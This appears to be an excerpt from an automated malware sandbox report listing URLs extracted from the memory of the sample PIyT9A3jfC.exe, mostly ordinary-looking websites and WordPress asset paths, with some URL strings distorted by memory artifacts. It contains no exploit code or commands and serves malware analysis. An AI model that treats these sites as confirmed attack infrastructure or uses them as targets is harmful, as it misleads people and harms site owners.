00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/classic-themes.min.css?ver=6.2.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/wlwmanifest.xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/c1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/m1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.777742716.0000000007697000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702274857.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/LLa
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/h.dll
                  Source: PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/M
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/_
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/_0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.754767578.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.754767578.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.804950474.0000000001423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/w
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/Y
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709131137.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.754527325.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.817464123.0000000001438000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/f;
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.000000000142A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/t1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.796045606.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnsds.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007715000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/C
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/er
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/3321935-2125563209-4053062332-1002
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/5563209-4053062332-1002
                  Source: PIyT9A3jfC.exe, 00000001.00000003.699360382.00000000013F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/CH
